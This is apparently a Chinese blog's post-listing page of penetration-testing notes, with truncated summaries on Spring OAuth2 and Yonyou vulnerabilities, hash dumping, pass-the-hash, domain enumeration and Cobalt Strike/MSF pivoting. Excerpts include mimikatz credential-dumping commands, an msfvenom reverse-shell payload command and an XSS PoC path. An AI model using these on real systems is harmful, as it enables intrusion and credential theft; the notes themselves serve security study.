上一页 1 2 3 4 5 6 7 ··· 12 下一页
2024年4月29日
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
摘要: Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) Spring Security OAuth是为Spring框架提供安全认证支持的一个模块。在其使用whitelabel views来处理错误时,由于使用了Springs Expression Languag 阅读全文
posted @ 2024-04-29 16:31 kalixcn 阅读(53) 评论(0) 推荐(0) 编辑
H2 Database Console未授权访问
摘要: H2 Database Console未授权访问 H2 database是一款java内存数据库,多用于单元测试。H2 database自带一个web管理页面,在Spring开发中,如果我们设置如下选项,即可允许外部用户访问WEB管理页面,且没有鉴权; spring.h2.console.enabl 阅读全文
posted @ 2024-04-29 15:20 kalixcn 阅读(169) 评论(0) 推荐(0) 编辑
2024年4月18日
hash抓取总结
摘要: 抓hash方法 mimikatz privilege::debug token::whoami token::elevate lsadump::sam privilege::debug sekurlsa::logonpasswords ps脚本 powershell -exec bypass Imp 阅读全文
posted @ 2024-04-18 09:17 kalixcn 阅读(15) 评论(0) 推荐(0) 编辑
2024年4月16日
Pass The hash攻击
摘要: Windows Hash 分类 LM Hash NTLM Hash Net-NTLM Hash Windows Hash简介 window系统内部不保存用户的明文密码,只保存密码的Hash值 本机用户的密码Hash是存放SAM文件中,文件路径为:C:\Windows\System32\config\ 阅读全文
posted @ 2024-04-16 15:39 kalixcn 阅读(15) 评论(0) 推荐(0) 编辑
域用户判断
摘要: 判断是否存在域 1. 网卡信息查询 ipconfig /all 查看DNS后缀搜索列表 2. 查询主机信息 systeminfo 查看域,如果"域的值为WORKGROUP",表示当前服务器不在域内。 3. 查询当前登录域及登录用户信息 net config workstation 4. 查看时间服务 阅读全文
posted @ 2024-04-16 10:16 kalixcn 阅读(126) 评论(0) 推荐(0) 编辑
2024年4月13日
Cobalt Strike 与 MSF 联动
摘要: 使用Cobalt Strike生成的会话和MSF相互连接,在内网渗透中,可以方便后期的渗透。 一、Cobalt Strike连接MSF会话 1. 上线msf会话 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport 阅读全文
posted @ 2024-04-13 14:19 kalixcn 阅读(86) 评论(0) 推荐(0) 编辑
2024年3月19日
用友NC v6.5放射型xss
摘要: 漏洞描述 用友NC6.5版本存在放射型xss fofa:app="用友-UFIDA-NC” 访问页面: POC: /uapws/pages/error.jsp?msg= 阅读全文
posted @ 2024-03-19 11:09 kalixcn 阅读(12) 评论(0) 推荐(0) 编辑
端口渗透思路总结
摘要: 文件共享服务端口 端口号 端口说明 使用说明 21、22、69 FTP/TFTP文件传输协议 允许匿名的上传、下载、爆破和嗅探操作 2049 NTS服务 爆破、未授权访问、远程代码执行 139 LDAP目录访问协议 注入、允许匿名访问、弱口令 远程连接服务端口 端口号 端口说明 使用说明 22 SS 阅读全文
posted @ 2024-03-19 09:54 kalixcn 阅读(34) 评论(0) 推荐(0) 编辑
其他漏洞
摘要: 漏洞介绍 用友GRP_U8 bx_historyDataCheck.jsp存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入Webshell、执行系统命令以及绕过登录限制 fofa:app="用友-GRP-U8" 用友NC accept.jsp处存在任意文件上传漏洞 f 阅读全文
posted @ 2024-03-19 09:54 kalixcn 阅读(8) 评论(0) 推荐(0) 编辑
用友U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞&任意文件上传漏洞
摘要: 漏洞简介 用友U8 CRM客户管理系统getemaildata.php存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器中的敏感文件。 用友U8 CRM客户关系管理系统getemaildata.php文件存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。 Fofa:body="用友U8CRM 阅读全文
posted @ 2024-03-19 08:42 kalixcn 阅读(209) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 ··· 12 下一页